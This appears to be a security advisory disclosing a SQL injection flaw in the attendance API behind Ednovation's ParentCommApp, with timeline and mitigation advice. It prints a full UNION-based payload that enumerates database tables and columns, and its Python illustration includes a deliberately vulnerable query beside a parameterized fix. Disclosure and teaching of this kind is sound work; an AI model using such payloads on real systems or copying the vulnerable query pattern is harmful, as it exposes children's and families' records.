
[CVE REQUESTED] ParentCommApp SQL Injection Backend API

Summary

A SQL injection vulnerability was identified in a backend API supporting Ednovation’s ParentCommApp — a communication platform used by preschools and parents. The vulnerability allows attackers to manipulate request parameters and potentially extract unauthorized records from the database.

Ednovation, headquartered in Singapore, is a leading provider of preschool education services across Asia and has grown into a chain of more than 60 preschools and enrichment centres across Singapore, China and ASEAN.

Background & Discovery

This issue was discovered while testing the ParentCommApp on iOS, with traffic intercepted using Burp Suite. After logging in, it was observed that the API call used to fetch child attendance status performed no validation and accepted unsanitized input, indicating a server-side flaw rather than a client implementation issue.

Affected Product

  • Vendor: Ednovation
  • App: ParentCommApp (iOS)
  • Platform: Backend APIs serving iOS/Android apps
  • Version: Affected prior to 2022 remediation

Vulnerability Details

While testing the iOS version of ParentCommApp using Burp Suite, an API call responsible for fetching child attendance status was observed to be vulnerable to SQL injection.

The vulnerable API accepted a childId parameter via POST request body and failed to sanitize the input. Manual testing with SQL payloads like:

'date=Sun%20Jun%2026%2016%3A19%3A23%20GMT%2B0800%202022&childId=12 UNioN \x0d\x0a  (\x0d\x0a    SELECT 111, 222, 333, 444, 555, 666, 777, 888, 999, 101010,\x0d\x0a      group_concat(a.combine separator \',\'), \x0d\x0a      121212, 131313, 141414   \x0d\x0a    from \x0d\x0a      (\x0d\x0a        SELECT \x0d\x0a          concat(\x0d\x0a            \'\"\', \x0d\x0a            table_name, \x0d\x0a            \'\"\', \x0d\x0a            \':\', \x0d\x0a            \'[\', \x0d\x0a            GROUP_CONCAT(\x0d\x0a              concat(\'\"\', COLUMN_NAME, \'\"\') separator \',\'\x0d\x0a            ), \x0d\x0a            \']\'\x0d\x0a          ) as combine \x0d\x0a        FROM \x0d\x0a          INFORMATION_SCHEMA.COLUMNS \x0d\x0a        WHERE \x0d\x0a          TABLE_SCHEMA = \'dev_XXXX\' \x0d\x0a        GROUP BY \x0d\x0a          TABLE_NAME \x0d\x0a        ORDER BY \x0d\x0a          table_name\x0d\x0a      ) as a\x0d\x0a  )\x0d\x0alimit 1,2#&action=getChildAttendanceStatus'

resulted in expanded database output, confirming an authentication-independent injection flaw.

Exploitation Impact

  • Sensitive data disclosure: Unauthorized access to other child/parent/teacher records
  • Database enumeration: Potential for data extraction beyond target record

Mitigation

Vendors should validate and sanitize all input parameters server-side, and use parameterized queries (prepared statements) or an ORM framework so that user-supplied values are never concatenated into SQL text.
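As an added illustration (example code written for this write-up, not the vendor's backend; the table, column names and ISO date format are assumptions), the flawed handler and its hardened form side by side, using an in-memory SQLite table so it runs offline:

```python
import sqlite3
from datetime import date


class BadRequest(ValueError):
    # Raised by the hardened handler when a request parameter fails validation.
    pass


def make_db():
    # Constructed stand-in for the attendance table behind getChildAttendanceStatus.
    # Table and column names are assumptions, not the vendor's real schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE attendance (child_id INTEGER, day TEXT, status TEXT)")
    conn.executemany("INSERT INTO attendance VALUES (?, ?, ?)", [
        (12, "2022-06-26", "present"),
        (13, "2022-06-26", "absent"),
        (14, "2022-06-26", "present"),
    ])
    return conn


def get_attendance_vulnerable(conn, child_id, day):
    # Mirrors the reported flaw: request values are pasted straight into the SQL
    # text, so a childId such as "0 UNION SELECT ..." rewrites the query and
    # returns other children's rows instead of only the requested one.
    sql = ("SELECT child_id, day, status FROM attendance "
           f"WHERE day = '{day}' AND child_id = {child_id}")
    return conn.execute(sql).fetchall()


def get_attendance_fixed(conn, child_id, day):
    # Layer 1: server-side validation. childId must be a decimal integer and the
    # date must parse as ISO YYYY-MM-DD (ISO format is an assumption here).
    if not isinstance(child_id, str) or not child_id.isdigit():
        raise BadRequest("childId must be a positive integer")
    try:
        day = date.fromisoformat(day).isoformat()
    except ValueError:
        raise BadRequest("date must be YYYY-MM-DD") from None
    # Layer 2: a parameterized statement. Values travel to the driver separately
    # from the statement text, so they can never change the query's structure.
    sql = "SELECT child_id, day, status FROM attendance WHERE day = ? AND child_id = ?"
    return conn.execute(sql, (day, int(child_id))).fetchall()
```

With the constructed data, the vulnerable handler returns all three rows for a UNION-style childId, while the hardened handler rejects that value before any query runs and returns exactly one row for a legitimate id.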

Timeline

  • 2022-07: Issue discovered and responsibly reported to vendor
  • 2022-07: Vendor acknowledged and deployed a patch
  • 2025-07: Public disclosure and CVE request initiated

This post is licensed under CC BY 4.0 by the author.